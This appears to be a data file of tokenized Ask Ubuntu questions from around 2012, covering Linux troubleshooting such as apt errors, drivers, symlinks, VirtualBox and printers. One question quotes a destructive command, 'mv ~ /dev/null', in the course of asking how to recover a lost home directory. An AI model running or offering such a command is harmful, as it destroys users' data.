user_query = \ select '/var/vmail/ % d/ % n ' as home , 'maildir : /var/vmail/ % d/ % n ' as mail , \ 150 as uid , 8 as gid , concat ( 'dirsize : storage= ' , quota ) as quota \ from mailbox where username = ' % u ' and active = '1' and that pretty much does it for the config part of what i 'm trying to do . any ideas of what i 'm doing wrong ? { i should be bald by this time tomorrow : ) }
192690	what is `` link to executable '' ?	what is `` link to executable '' ? i 'm trying to understand what `` gcc '' is . if i open properties of it in unity ui it says `` link to executable '' . i googled it . tried following commands link readlink ln i 'm confused . what command i should use in order to : check whether file is link or not view where link points to change destination of a link ( i need to repoint gcc to gcc 4.7 in my case )
192691	how to install qtcurve 'tar.gz ' theme in kubuntu 12.04 ?	i have downloaded this theme from kde-look . how i can install it ? i copied the uncompressed files to ~.kde/share/apps/desktoptheme/ but it does n't work .
192694	firefox is not working	i am using 12.04 , but my firefox is not working . alex @ alex : firefox x_pcomglueload error for file /usr/lib/firefox/libxpcom.so xibxulso : connot open shared object file : no such fire or directory . any help would be apperciate .
192698	wobble effects not working in compiz	just couple of days before installed ubuntu 12.04 with all the necessary upgradations . also installed compiz settings manager & loved the animations & wobble effects of windows . but after restarting windows today , started receiving error messages & wobble effects are disappeared . also , other settings created by me in my last login , like small sidebar icons , too disappeared & unable to find even option in `` all settings > > appearance '' to resize the icons . loved ubuntu 12.04 , specially animation & wobble effects but unhappy with these errors .
192702	can i recover a file from /dev/null ?	mv ~ /dev/null moves my home directory to a black hole . can i recover my home directory from /dev/null ?
192705	what 's the difference in content between the ubuntu and lubuntu software centers ? why are n't winners of the app showdown available in the latter ?	what 's the difference in content between the ubuntu and lubuntu software centers ? i 've seen this are softwares installable on ubuntu also installable on lubuntu ? which indicates that the content should be the same . however , i looked for ridual , orthcal , cuttlefish and menulibre . while all four are available in the ubuntu software center , they are n't listed in the lubuntu software center . will they eventually be listed ? who decides ? i 'm asking because one of the criteria in the apps showdown , if i understood correctly , was desktop integration . if by `` desktop '' , unity is specifically implied then it would make sense not including them in the lubuntu software center . is that correct ? i 'm on 12.04 .
192711	how can i update the firmware on a dwm-156 hsupa 3.75g usb adapter ?	i am using dwm-156 hsupa 3.75g usb adapter.its hardware version is a6 and firmware version is 6.0.0ww.i have purchased the modem one month back.using this i am not able to receive call or make call . one my friend purchased the same product recently.he is able to receive call and make call.his firmware version is 6.0.0in.is any body know how can i update it or is any other option ?
192712	is it possible to make pane/column dividers/separators wider in nautilus ?	in nautilus i struggle to select the divider/separator between columns or panels . can something be done about it ?
192715	android sdk and eclipse ca n't fetch packages	i have this problem where i ca n't download packages in my android sdk and eclipse . apparently these programs ca n't fetch the repository . for android sdk , it always gets stuck on fetching the addon_list.xml file . it then becomes unresponsive . eclipse just ca n't get the list regardless of how long i waited . this is the same problem i 'm having : http : //stackoverflow.com/questions/9035773/eclipse-android-sdk-wont-fetch-update-connect-or-do-anything-useful i 've done most of the solutions i found online but none of them works . i 've isolated the problem though . i dual boot windows , but my windows can get the files from the android repository . so i thought it 's ubuntu , but i 've tried running android sdk at school while using ubuntu and i was able to get the repository files fine . that also eliminated my wireless driver and the sdk as the source of the problem . the router is what i think the source of the problem . is there some sort of setting that needs to be enabled or disabled for this to work properly ? i 've been experimenting but none really worked yet and i 'm afraid to touch other settings . i was thinking that there must be something wrong with how my router interacts with the os . so what should i do ? really need this to work for a project . i 'm using dsl g640t router .
192717	how to 'talk ' to usb modem in linux ?	i have a usb modem that is identified in linux ( ubuntu 12.04 ) with lsusb as bus 001 device 003 : id 0572:1329 conexant systems ( rockwell ) , inc. how to talk to that device ( e.g . with microcom etc ? ) ? what dev device should i use ? there is no /dev/ttyusbxxx available and just one /dev/ttyacm0 .
192719	change system settings depending on whether a monitor is plugged in	i 'm currently using a laptop running ubuntu 12.04 . when i 'm at work i plug in a monitor , mouse and keyboard . then i close my laptops screen and use it as a normal pc . everytime i plug it in and plug it out , i have to change my system settings , because normally my laptop would suspend to ram , when i close its screen . also i have to change where my graphics card should display my desktop . is there any way to execute some script when an external monitor or usb-device is plugged in or out ? if yes , is there any way to change my system settings by a shell script ? if not , is there any other way to do it ?
192721	12.04 random sounds sometimes after startup	i 'm not quite sure what the sound is , but it has only started happening in the last two days . the only way i can describe it would be that it sounds like a wooden xylophone being tapped lightly . it will play at random intervals ranging between 1 second to a couple minutes for up to a half hour ( from what i have noticed ) after startup . if anybody has any ideas as to what is causing this or how to fix it i would appreciate it . system information : computer : toshiba satellite l655-s5160 audio driver : conexant audio driver ( v4.119.0.60 ; 07-14-2010 ; 41.89m )
192725	how do i make sure that canonical get affiliate benefits when i buy from amazon ?	ubuntu 12.10 has a new feature to search and buy from amazon , either from the dash , or from a unity webapp . this is quite controversial , but for my part , i quite ok with it . so when i buy something from amazon ( which i did before , and i 'll do tomorow ) , i 'd like to make sure the affiliate revenue are really given to ubuntu/canonical : i would have bought anyway , so financing my prefered os by doing so makes sense to me . how does it work , and how can i know my order get accounted to ubuntu/canonical affiliate program ? what if i navigate the amazon site before i buy ? what if i login or logout from amazon , does ubuntu still benefit from my order ?
192729	how to group icons based on category on the desktop ?	i have a lot icons on the desktop and i want to manage them by grouping icons of related programs . however , i have n't found any utility like fences in windows . have you met any utility like that yet ?
192733	running on low graphics mode after kernel upgrade	i am running ubuntu 12.04 ( alongside windows 7 ) . 2 days back , 12.04 was running fine . then it told me to please reboot so updates ( i think only the kernel got upgraded at this time ) could be applied . on reboot , i get the message `` your screen , graphics card , and input device settings could not be detected correctly . you will need to configure them yourself . '' at this point , the keyboard and mouse are not functional , so i can not click anything or configure anything . please help ! during boot , when grub comes up , the keyboard works just fine , letting choose which kernel version i want or to boot windows . i tried starting with previous kernels , but that did not work either . my system has an intel i5 and integrated intel hd graphics . thanks for helping me out !
192742	hardware buttons problem . the panel with hardware buttons is missing	i have problem with hardware buttons . i have msi vr630x , but my panel with buttons for wifi , camera and bluetooth are missing ( it has been removed at all ) . is there a way to turn devices on ? i have these devices working , i just do n't have buttons to turn them on .
192747	where does nautilus stores bookmark names ?	if i create a bookmark with nautilus , its location is stored on ~/.gtk-bookmarks , but not his name . i 've created a test bookmark named weirdy , and tried to do a grep on my home for that name , and i found nothing . where does nautilus stores bookmark names ?
192753	security problem with pidgin ?	edit , courtesy of google translate : i use pidgin in ubuntu and open new windows appear with strange ids is speaking to me in english , actually generate any response messages automatically after i give and finally asks me to go to a link ( k normally do not go ) ii ignore and give another id appears 3-4 days original , as posted : folosesc pidgin in ubuntu si imi apar ferestre noi deschise cu id-uri ciudare care vorbesc cu mine in engleza , de fapt genereaza mesaje automat dupa orice raspuns dau eu iar la final imi cere sa intru pe un link ( normal k nu intru ) ii dau ignore si la 3-4 zile apare alt id
192756	how do i allow full brightness control on unity ?	when i use the brightness changing buttons unity changes the brightness by two levels each time to create a nice effect . however , i only have about 10 different brightness settings and so this effect has caused a reduction in brightness settings to 5 . i change my brightness regularly to suit the lighting in the room i 'm in , but am unable to do this so effectively now that the number of levels has been reduced . is there any way of turning off this brightness effect and controlling my brightness setting more sensitively ? thank you for your time . edit : it may not be 2 levels it changes at a time but 3 , i 've worked this out as the brightness control panel allows you to set the brightness accurately and there seem to be a couple of settings that the button misses completely when i change the brightness with the buttons .
192758	is it possible to switch off the amd ati radeon hd 7670m on the hp envy 6 ?	i want to buy this laptop , but i have had issues with amd radeon in my previous laptop , and i want to be sure i can switch it off and use the internal intel hd4000
192761	using usb-to-ethernet with ubuntu 12.04	being a newbie , please excuse if the technical jargon used is not a universally accepted one : ) i have a particular device ( say device a ) whose usb2.0 driver is available from linux community . ubuntu 12.04 based pc is able to detect that device via the available driver . my requirement is to ensure that pc can exchange the command as well as data with device a over tcp/ip packets ( in other words , instead of just a usb based driver , there should be a tcp/ip wrapper over the device usb driver and still does the same job as the usb driver was doing before ) . bought an usb ( female ) to rj-45 adapter , connected device a ( male ) usb to the usb female end of the adapter and the ethernet end connected to the router . pc also is connected to the same router so that both device a and the pc have the ip address in the same subnet range . so the packets produced by the device a can be routed to the pc via some binding ( not sure how i can achieve this , but conceptual idea ) . here are the issues i can see as of now usb to rj-45 is just a hardware signal conversion and not a nic in itself and hence no mac/ip address assigned . can we bind a virtual nic created in pc with this connector ? any available usb to ip command as well as data translation wrappers available ? e.g . command for the device a on ethernet converted to command for the device a on usb which is then acted upon the device as a command from the usb driver there is some missing link in my understanding and hence it would be of great help if you can bounce off some ideas on how i can take this forward so that device a and pc exchange data over ip . device a is just a webcam type of device which will just stream out the video data .
192762	cant boot ubuntu grub wubi install	i have recently installed ubuntu 12.04 which was an wubi install so i donât have a livecd . whenever i boot the computer it goes straight to gnu grub version 1.99-21ubuntu3.1 . is there a way that i can bypass this and boot into ubuntu . i am running it along side with windows vista home premium x32bit
192763	how can i remove home/folders from my unity dash ?	how can i remove from dash the home/folders : 'pictures ' , 'music ' , 'videos ' and 'downloads '' , which i have already removed from my /home directory ?
192766	sudo apt-get update problem	i have a problem with sudo apt-get update that i ca n't seem to fix and it 's causing problems with alot of installations i want to do . i run ubuntu 12.04 . ign http : //ftp.availo.se precise inrelease ign http : //ftp.availo.se precise-updates inrelease ign http : //ftp.availo.se precise-backports inrelease ign http : //ftp.availo.se precise-security inrelease get:1 http : //repository.spotify.com stable inrelease [ 2,979 b ] ign http : //ppa.launchpad.net precise inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //archive.canonical.com precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //repository.spotify.com stable inrelease ign http : //ftp.availo.se precise release.gpg ign http : //ftp.availo.se precise-updates release.gpg ign http : //ftp.availo.se precise-backports release.gpg ign http : //repository.spotify.com stable/non-free amd64 packages/diffindex hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //extras.ubuntu.com precise release.gpg ign http : //ftp.availo.se precise-security release.gpg ign http : //repository.spotify.com stable/non-free i386 packages/diffindex ign http : //repository.spotify.com stable/non-free translationindex hit http : //ppa.launchpad.net precise release.gpg hit http : //archive.canonical.com precise release hit http : //extras.ubuntu.com precise release ign http : //ftp.availo.se precise release ign http : //ftp.availo.se precise-updates release hit http : //ppa.launchpad.net precise release hit http : //archive.canonical.com precise/partner amd64 packages hit http : //extras.ubuntu.com precise/main sources ign http : //ftp.availo.se precise-backports release ign http : //ftp.availo.se precise-security release hit http : //ppa.launchpad.net precise release hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex hit http : //ppa.launchpad.net precise release hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //ftp.availo.se precise/main translationindex ign http : //ftp.availo.se precise/multiverse translationindex ign http : //ftp.availo.se precise/restricted translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //extras.ubuntu.com precise/main translationindex ign http : //ftp.availo.se precise/universe translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //ftp.availo.se precise-updates/main translationindex ign http : //ftp.availo.se precise-updates/multiverse translationindex ign http : //ftp.availo.se precise-updates/restricted translationindex ign http : //ftp.availo.se precise-updates/universe translationindex hit http : //repository.spotify.com stable/non-free amd64 packages ign http : //ftp.availo.se precise-backports/main translationindex ign http : //ftp.availo.se precise-backports/multiverse translationindex ign http : //ftp.availo.se precise-backports/restricted translationindex ign http : //ftp.availo.se precise-backports/universe translationindex hit http : //repository.spotify.com stable/non-free i386 packages ign http : //archive.canonical.com precise/partner translation-en_us ign http : //ftp.availo.se precise-security/main translationindex ign http : //ftp.availo.se precise-security/multiverse translationindex ign http : //ftp.availo.se precise-security/restricted translationindex ign http : //ftp.availo.se precise-security/universe translationindex ign http : //repository.spotify.com stable/non-free translation-en_us ign http : //archive.canonical.com precise/partner translation-en ign http : //repository.spotify.com stable/non-free translation-en ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en err http : //ftp.availo.se precise/main sources 404 not found err http : //ftp.availo.se precise/restricted sources 404 not found err http : //ftp.availo.se precise/universe sources 404 not found err http : //ftp.availo.se precise/multiverse sources 404 not found err http : //ftp.availo.se precise/main amd64 packages 404 not found err http : //ftp.availo.se precise/restricted amd64 packages 404 not found err http : //ftp.availo.se precise/universe amd64 packages 404 not found err http : //ftp.availo.se precise/multiverse amd64 packages 404 not found err http : //ftp.availo.se precise/main i386 packages 404 not found err http : //ftp.availo.se precise/restricted i386 packages 404 not found err http : //ftp.availo.se precise/universe i386 packages 404 not found err http : //ftp.availo.se precise/multiverse i386 packages 404 not found err http : //ftp.availo.se precise-updates/main sources 404 not found err http : //ftp.availo.se precise-updates/restricted sources 404 not found err http : //ftp.availo.se precise-updates/universe sources 404 not found err http : //ftp.availo.se precise-updates/multiverse sources 404 not found err http : //ftp.availo.se precise-updates/main amd64 packages 404 not found err http : //ftp.availo.se precise-updates/restricted amd64 packages 404 not found err http : //ftp.availo.se precise-updates/universe amd64 packages 404 not found err http : //ftp.availo.se precise-updates/multiverse amd64 packages 404 not found err http : //ftp.availo.se precise-updates/main i386 packages 404 not found err http : //ftp.availo.se precise-updates/restricted i386 packages 404 not found err http : //ftp.availo.se precise-updates/universe i386 packages 404 not found err http : //ftp.availo.se precise-updates/multiverse i386 packages 404 not found err http : //ftp.availo.se precise-backports/main sources 404 not found err http : //ftp.availo.se precise-backports/restricted sources 404 not found err http : //ftp.availo.se precise-backports/universe sources 404 not found err http : //ftp.availo.se precise-backports/multiverse sources 404 not found err http : //ftp.availo.se precise-backports/main amd64 packages 404 not found err http : //ftp.availo.se precise-backports/restricted amd64 packages 404 not found err http : //ftp.availo.se precise-backports/universe amd64 packages 404 not found err http : //ftp.availo.se precise-backports/multiverse amd64 packages 404 not found err http : //ftp.availo.se precise-backports/main i386 packages 404 not found err http : //ftp.availo.se precise-backports/restricted i386 packages 404 not found err http : //ftp.availo.se precise-backports/universe i386 packages 404 not found err http : //ftp.availo.se precise-backports/multiverse i386 packages 404 not found err http : //ftp.availo.se precise-security/main sources 404 not found err http : //ftp.availo.se precise-security/restricted sources 404 not found err http : //ftp.availo.se precise-security/universe sources 404 not found err http : //ftp.availo.se precise-security/multiverse sources 404 not found err http : //ftp.availo.se precise-security/main amd64 packages 404 not found err http : //ftp.availo.se precise-security/restricted amd64 packages 404 not found err http : //ftp.availo.se precise-security/universe amd64 packages 404 not found err http : //ftp.availo.se precise-security/multiverse amd64 packages 404 not found err http : //ftp.availo.se precise-security/main i386 packages 404 not found err http : //ftp.availo.se precise-security/restricted i386 packages 404 not found err http : //ftp.availo.se precise-security/universe i386 packages 404 not found err http : //ftp.availo.se precise-security/multiverse i386 packages 404 not found ign http : //ftp.availo.se precise/main translation-en_us ign http : //ftp.availo.se precise/main translation-en ign http : //ftp.availo.se precise/multiverse translation-en_us ign http : //ftp.availo.se precise/multiverse translation-en ign http : //ftp.availo.se precise/restricted translation-en_us ign http : //ftp.availo.se precise/restricted translation-en ign http : //ftp.availo.se precise/universe translation-en_us ign http : //ftp.availo.se precise/universe translation-en ign http : //ftp.availo.se precise-updates/main translation-en_us ign http : //ftp.availo.se precise-updates/main translation-en ign http : //ftp.availo.se precise-updates/multiverse translation-en_us ign http : //ftp.availo.se precise-updates/multiverse translation-en ign http : //ftp.availo.se precise-updates/restricted translation-en_us ign http : //ftp.availo.se precise-updates/restricted translation-en ign http : //ftp.availo.se precise-updates/universe translation-en_us ign http : //ftp.availo.se precise-updates/universe translation-en ign http : //ftp.availo.se precise-backports/main translation-en_us ign http : //ftp.availo.se precise-backports/main translation-en ign http : //ftp.availo.se precise-backports/multiverse translation-en_us ign http : //ftp.availo.se precise-backports/multiverse translation-en ign http : //ftp.availo.se precise-backports/restricted translation-en_us ign http : //ftp.availo.se precise-backports/restricted translation-en ign http : //ftp.availo.se precise-backports/universe translation-en_us ign http : //ftp.availo.se precise-backports/universe translation-en ign http : //ftp.availo.se precise-security/main translation-en_us ign http : //ftp.availo.se precise-security/main translation-en ign http : //ftp.availo.se precise-security/multiverse translation-en_us ign http : //ftp.availo.se precise-security/multiverse translation-en ign http : //ftp.availo.se precise-security/restricted translation-en_us ign http : //ftp.availo.se precise-security/restricted translation-en ign http : //ftp.availo.se precise-security/universe translation-en_us ign http : //ftp.availo.se precise-security/universe translation-en fetched 2,979 b in 9s ( 328 b/s ) w : gpg error : http : //repository.spotify.com stable inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey 082ccedf94558f59 w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/restricted/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/universe/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/multiverse/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/restricted/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/universe/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/multiverse/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/main/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/restricted/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/universe/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/main/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/restricted/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/universe/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/multiverse/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/main/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/restricted/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/universe/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/multiverse/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/main/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/restricted/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/universe/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-updates/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/main/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/restricted/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/universe/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/multiverse/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/main/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/restricted/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/universe/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/multiverse/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/main/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/restricted/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/universe/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-backports/multiverse/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/main/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/restricted/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/universe/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/multiverse/source/sources 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/main/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/restricted/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/universe/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/multiverse/binary-amd64/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/main/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/restricted/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/universe/binary-i386/packages 404 not found w : failed to fetch http : //ftp.availo.se/ubuntu/dists/precise-security/multiverse/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i would appreciate a fix to this . thank you for the help .
192771	unreal torunament ( ut99 ) no sound in 12.04 ?	i 've been trying to get sound working in unreal torunament for a couple of days now . i 'm using the native unreal tournament version , not wine or something like that . i have sound in all other games and media applications that i have tried . in older ubuntu versions it worked fine . i 'm now using kubuntu 12.04 , i have all the alsa-oss and oss-compat packages installed . i have followed most of the advice out there , and it all seems to fall on padsp and aoss . my problem , however , is that even when trying to use padsp or aoss , i ca n't get any sound at all . ( note ut has two output modes : alaudio and generic ( oss ) , i have tried both ) . is there some configuration required to use padsp or aoss correctly ? i have ran it like padsp ./ut and aoss ./ut if using the al backend in ut i get ( both aoss and padsp give this ) : bound to alaudio.so open /dev/dsp : invalid argument audio initialization failed . if using the oss backend in ut i get ( both aoss and padsp give this ) : bound to audio.so failed to open audio device . audio initialization failed . note that so far , i have gotten absolutely no sound . thanks for any help !
192778	how do i install a canon pixma mx700 as a standalone wired network printer ?	how can i install a canon pixma mx700 as a standalone wired network printer on amd64 ubuntu 12.04 ? i have it set up with fixed ip of 192.168.1.4 and have tried various uri 's such as : socket : //192.168.1.4:80 socket : //192.168.1.4:80/tcp socket : //192.168.1.4:139 socket : //192.168.1.4:139/tcp ipp : //192.168.1.4:80 ipp : //192.168.1.4:80/tcp ipp : //192.168.1.4:80/resource and a whole lot more as well . under `` network diagnostic tools '' i find two ports - 80/tcp and 139/tcp - that is why i have used them , but i have also tried 9100 - all to no avail . please can someone help ?
192779	problem with snmp and mibs	i am installing zabbix to monitor via snmp some devices from a machine running ubuntu 12.04 server . there is a problem with mib definitions , since snmp commands do no properly translate some of the mibs . i have already installed the `` snmp-mibs-downloader '' package , so the files containing the mib descriptions are properly installed . the mib are only translated to obtain the numeric key ( the mib files are accessible to the snmp commands ) , but the results returned by the snmpget command do not properly translate the key . the zabbix templates that i am using do expect the key translated ( snmpv2-mib : :sysuptime.0 ) , so , the current results are not recognised and these are ignored . test case : $ snmptranslate -on snmpv2-mib : :sysuptime.0 .1.3.6.1.2.1.1.3.0 $ snmpget -v 2c -c public 192.168.1.1 1.3.6.1.2.1.1.3.0 iso.3.6.1.2.1.1.3.0 = timeticks : ( 2911822510 ) 337 days , 0:23:45.10 on another machine ( running a very old red hat based distribution ) , the snmp commands perform both , the direct and reverse traslation , as expected : # snmptranslate -on snmpv2-mib : :sysuptime.0 .1.3.6.1.2.1.1.3.0 # snmpget -v 2c -c public 192.168.1.1 1.3.6.1.2.1.1.3.0 snmpv2-mib : :sysuptime.0 = timeticks : ( 2911819485 ) 337 days , 0:23:14.85 what is the problem on my ubuntu box ? is there something i am missing ?
192780	virtualbox on ubuntu host : access guests by hostname	i have several virtualbox appliances ( windows , linux ) each of them configured with two network adapters : nat for accessing the internet host-only for hosts < > hosts and hosts < > guest communication problem is , i can only communicate by ip address . i want to communicate by hostname , ie . i want to be able to reach any host from any other host ( or guest ) by using the hostname . is this possible ? i already have a host-only adapter ( vboxnet0 ) on the host machine , and networking is fine , but i would like to avoid assigning static ips to each appliance .
192785	how to integrate the run command to be a unity lens ?	i want to integrate the run command to be a unity lens so i do n't need to press alt + f2 to run a command . it would then be reachable from dash like any other lens such as file , music , ..
192787	truly quiet deja dup	i have set-up deja dup to take backup over a ssh connection on the lan . at times when the link is down , deja dup pops out a box 'no route to host ' . is there a way to avoid this ? like a -quiet switch ? ? or at least redirect the output to some log-file ?
192793	installing octave3.4 on ubuntu 10.04	i try to install ocatve 3.4 under ubuntu 10.04 to be able to work in eclipse . i followed the link installing the latest octave 3.6 in ubuntu 10.04 lts i have an output : ~ $ sudo apt-get install octave-3.4.3-64-bit reading package lists ... done building dependency tree reading state information ... done octave-3.4.3-64-bit is already the newest version . the following packages were automatically installed and are no longer required : python-matplotlib-data ttf-lyx python-tz python-pyparsing use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . when i try to run octave i have : ~ $ octave the program 'octave ' can be found in the following packages : * octave3.0 * octave3.2 try : sudo apt-get install < selected package > i am not sure what i should do , i found there http : //wiki.octave.org/octave_for_gnu/linux that 3.4.3 is the latest version for ubuntu 10.04 . i am not sure if i have to remove all packages , or set-up some path or do it in different way . thanks for help
192798	reading the output from any process using it 's pid	is it possible to attach a terminal to an already runing process by using it 's pid in a similar fashion to using the fg command for jobs .
192801	how do i enable backlit keyboard on asus n56vm	i recently bought an asus n56vm which is suppose to ship with a backlit keyboard . however on startup and when dark there is no backlit keyboard . when pressing the fn+f3/f4 buttons , the animation for increasing/decreasing the brightness of the keyboard does appear . how do i fix this problem . its an asus n56vm-s4034v .
192802	gedit snippets plugin not working for encodings other than utf-8	i just ran into a problem with the snippets plugin of gedit 3.4.1 running on ubuntu 12.04 . the problem is that the snippets plugin stops working ( i. e. , does n't react to keyboard shortcuts and tab-completion ) when a file has an encoding other than utf-8 , e. g. iso-8859-1 . in that case , the snippets plugin does n't work any more and the error output on the console states : traceback ( most recent call last ) : file `` /usr/lib/gedit/plugins/snippets/library.py '' , line 678 , in accelerator_activated ret = cb ( group , obj , keyval , mod ) file `` /usr/lib/gedit/plugins/snippets/windowactivatable.py '' , line 216 , in accelerator_activated return controller.accelerator_activate ( keyval , mod ) file `` /usr/lib/gedit/plugins/snippets/document.py '' , line 148 , in accelerator_activate self.apply_snippet ( snippets [ 0 ] ) file `` /usr/lib/gedit/plugins/snippets/document.py '' , line 519 , in apply_snippet env = self.get_environment ( ) file `` /usr/lib/gedit/plugins/snippets/document.py '' , line 483 , in get_environment v = variables [ var ] ( buf ) file `` /usr/lib/gedit/plugins/snippets/document.py '' , line 348 , in env_get_current_line return { 'utf8 ' : u8 , 'noenc ' : self.string_in_native_doc_encoding ( buf , u8 ) } file `` /usr/lib/gedit/plugins/snippets/document.py '' , line 320 , in string_in_native_doc_encoding except glib.gerror : nameerror : global name 'glib ' is not defined apparently , there is a problem in file /usr/lib/gedit/plugins/snippets/document.py where a function glib.convert is called whenever the document encoding is not utf-8 . consequently , if i save the same file as utf-8 , it all works well . i 'm not much into python , so any pointer how to fix this would be much appreciated .
192804	virt-manager usb 2.0 problem	i have an ubuntu 12.04 64bit with qemu/kvm & virt-manager 0.9.4 ( latest compiled from source ) installed my problem is that all guest windows machines does not recognize usb2.0 ports : windows xp recognizes all usb devices as usb 1.0 windows 7 recognizes usb controller as usb1.0 but does not recognize all usb devices ( yellow mark ) my system is fully up-to-date and i have recently upgraded virt-manager from 0.9.1 to 0.9.4 and also upgraded to virtinst 0.600.3 and virt-viewer 0.5.4 the problem also existed in 0.9.1 .
192806	how do i get bibletime 2.91 running on 12.04 ?	i would like to install the latest version of bibletime ( 2.9.1 ) on my computer because the version in the official repositories ( 2.8.1 ) has a bug with the `` mag '' feature . i had installed 2.9.1 on 12.04 32 bit through one of the following ppa 's : ppa : pkgcrosswire/ppa ppa : pkgcrosswire/developer-testing now on an ubuntu 12.04.1 64 bit , i 'm getting a dependency issue . it seems that it depends on libsword8 but it should actually depend on libsword9 which is available in the repositories . see http : //sword-dev.350566.n4.nabble.com/ubuntu-12-04-td4577002.html can someone help me install this app please ? edit : apt-get install -f bibletime yields the following : the following packages have unmet dependencies : bibletime : depends : libsword8 ( > = 1.6.2+dfsg ) but it is not installable depends : bibletime-data ( = 2.9.1-0ubuntu0~r70~precise1 ) but 2.9.1-1~ppa2~precise is to be installed e : unable to correct problems , you have held broken packages .
192808	share files in virtualbox between ubuntu host and windowsxp guest	how can i share files between my ubuntu 12.04 and windowsxp running as a virtualbox guest ?
192809	installation problems on my hp pavilion g7 1303	i just tried to install ubuntu using wubi ( 12.04.01 ) . i restarted and i got that `` no wubildr '' stuff and then black screen and nothing happens . please help ! ! !
